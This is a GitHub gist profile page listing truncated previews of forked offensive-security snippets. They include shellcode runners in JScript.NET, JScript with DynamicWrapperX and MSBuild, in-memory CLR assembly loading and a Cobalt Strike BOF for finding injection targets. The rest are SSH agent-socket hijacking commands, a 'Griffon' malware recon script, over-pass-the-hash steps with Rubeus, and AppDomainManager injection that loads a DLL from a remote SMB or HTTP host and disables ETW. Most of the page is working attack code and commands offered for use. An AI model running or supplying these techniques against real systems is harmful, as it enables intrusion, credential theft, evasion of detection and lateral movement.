Skip to content

Instantly share code, notes, and snippets.

View leftp's full-sized avatar

Lefteris Panos leftp

124 followers · 265 following
View GitHub Profile
@leftp
leftp / shellcode.js
Created April 23, 2021 11:42 — forked from Ridter/shellcode.js
Execute ShellCode Via Jscript.NET
import System;
import System.Runtime.InteropServices;
import System.Reflection;
import System.Reflection.Emit;
import System.Runtime;
import System.Text;
//C:\Windows\Microsoft.NET\Framework\v2.0.50727\jsc.exe Shellcode.js
//C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe Shellcode.js
@leftp
leftp / TestAssembly.cs
Created April 19, 2021 10:26 — forked from Arno0x/TestAssembly.cs
This code shows how to load a CLR in an unmanaged process, then load an assembly from memory (not from a file) and execute a method
/*
================================ Compile as a .Net DLL ==============================
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library /out:TestAssembly.dll TestAssembly.cs
*/
using System.Windows.Forms;
namespace TestNamespace
@leftp
leftp / EnumCLR.c
Created March 23, 2021 07:21 — forked from G0ldenGunSec/EnumCLR.c
Cobalt Strike BOF to identify processes with the CLR loaded with a goal of identifying SpawnTo / injection candidates.
#include <string.h>
#include <stdio.h>
#include <windows.h>
#include <psapi.h>
#include "beacon.h"
DECLSPEC_IMPORT BOOL WINAPI KERNEL32$K32EnumProcesses(DWORD *, DWORD, LPDWORD);
DECLSPEC_IMPORT WINBASEAPI HANDLE WINAPI KERNEL32$OpenProcess(DWORD, BOOL, DWORD);
DECLSPEC_IMPORT BOOL WINAPI KERNEL32$K32EnumProcessModulesEx(HANDLE, HMODULE*, DWORD, LPDWORD, DWORD);
@leftp
leftp / SSH Agent Forwarding.md
Created January 13, 2021 07:42 — forked from int0x80/SSH Agent Forwarding.md

Here's one of my favorite techniques for lateral movement: SSH agent forwarding. Use a UNIX-domain socket to advance your presence on the network. No need for passwords or keys.

root@bastion:~# find /tmp/ssh-* -type s
/tmp/ssh-srQ6Q5UpOL/agent.1460

root@bastion:~# SSH_AUTH_SOCK=/tmp/ssh-srQ6Q5UpOL/agent.1460 ssh [email protected]

user@internal:~$ hostname -f
internal.company.tld
@leftp
leftp / roadrunner.js
Created December 22, 2020 07:42
RoadRunner - Register Shellcode HexBytes in JScript and Execute. - DynamicWrapperX
try {
new ActiveXObject('WScript.Shell').Environment('Process')('TMP') = 'C:\\Users\\Public';
var manifest = '<?xml version="1.0" encoding="UTF-16" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity type="win32" name="DynamicWrapperX" version="2.2.0.0"/> <file name="dynwrapx.dll.blg"> <comClass description="DynamicWrapperX Class" clsid="{89565276-A714-4a43-912E-978B935EDCCC}" threadingModel="Both" progid="DynamicWrapperX"/> </file> </assembly>';
// Create Base64 Object, supports encode, decode
//Magic is just a cool way to decode to byte array ;
function Magic(r){if(!/^[a-z0-9+/]+={0,2}$/i.test(r)||r.length%4!=0)throw Error("Not base64 string");for(var t,e,n,o,i,a,f="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",h=[],d=0;d<r.length;d+=4)t=(a=f.indexOf(r.charAt(d))<<18|f.indexOf(r.charAt(d+1))<<12|(o=f.indexOf(r.charAt(d+2)))<<6|(i=f.indexOf(r.charAt(d+3))))>>>16&255,e=a>>>
@leftp
leftp / _Steps.md
Created November 30, 2020 18:58
Capbility Diffusion 101 - MsBuild Sets - Shellcode.exe spikes - Shellcode Horcrux if you like that analogy. 

1. Open PowerShell
2. Set MSbuild GodMode Env Variable 
   $env:MSBUILDENABLEALLPROPERTYFUNCTIONS = 1 
3. Execute C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe msbuild.png.xml
   Note: This "Serves" Shellcode in a memory mapped file. 
   This is no accessible to other processes. 
   Change in line 62 in shellcode.cs . Manual offsets just to troll you. :)
 I leave this for you to explore
@leftp
leftp / gist:adf34506b89acd06b830526760f33725
Created October 24, 2020 05:52 — forked from kirk-sayre-work/gist:1a9476e7708ed650508f9fb5adfbad9d
Griffon Recon Tester Script
'' Griffon main actions start here.
Set file_system_object = CreateObject("Scripting.FileSystemObject")
temp_file_name = file_system_object.GetSpecialFolder(2) & "\" & file_system_object.GetTempName
' Start the detailed recon.
recon_info_str = get_network_adapter_info
network_info_str = ""
recon_info_str = recon_info_str & "SystemInfo" & "=" & get_system_info() & "&"
recon_info_str = recon_info_str & "SoftwareInfo" & "=" & get_product_or_process_info("Win32_Product") & "&"
@leftp
leftp / dnscanary_wmi
Created October 20, 2020 10:39
WMI dns canary
Dim dnsname
dnsname= "canary.troubleshootdomain.com"
Set wmi = GetObject("winmgmts:")
Set response = wmi.ExecQuery("Select * from Win32_PingStatus WHERE address='" & dnsname & "'")
@leftp
leftp / gist:1d812f71a92b3cff1593d9c6a7de8a62
Created September 10, 2020 11:09 — forked from HarmJ0y/gist:dc379107cfb4aa7ef5c3ecbac0133a02
Over-pass-the-hash with Rubeus and Beacon
##### IF ELEVATED:
# grab a TGT b64 blob with a valid NTLM/rc4 (or /aes256:X)
beacon> execute-assembly /home/specter/Rubeus.exe asktgt /user:USER /rc4:NTLM_HASH
# decode the base64 blob to a binary .kirbi
$ base64 -d ticket.b64 > ticket.kirbi
# sacrificial logon session (to prevent the TGT from overwriting your current logon session's TGT)
beacon> make_token DOMAIN\USER PassWordDoesntMatter
@leftp
leftp / README.md
Created September 1, 2020 17:36 — forked from byt3bl33d3r/README.md
Remote AppDomainManager Injection

This is a variation of the technique originally discovered by subtee and described here

TL;DR It essentially allows you to turn any .NET application into a lolbin by providing a configuration file and specifying the <appDomainManagerAssembly> element pointing to a specially crafted .NET assembly which executes when the application is loaded.

This variation allows you to load the AppDomainManager assembly from a UNC path or HTTP(s) server. Also disables ETW thanks to the <etwEnable> element :)

  1. Copy some binary you love to say, C:\Test. Lets use aspnet_compiler.exe as an example
  2. Compile test.cs to test.dll with a signed strong name, this is required to load an assembly outside of a .NET applications base directory.
  3. Host test.dll on a remote SMB or HTTP(S) server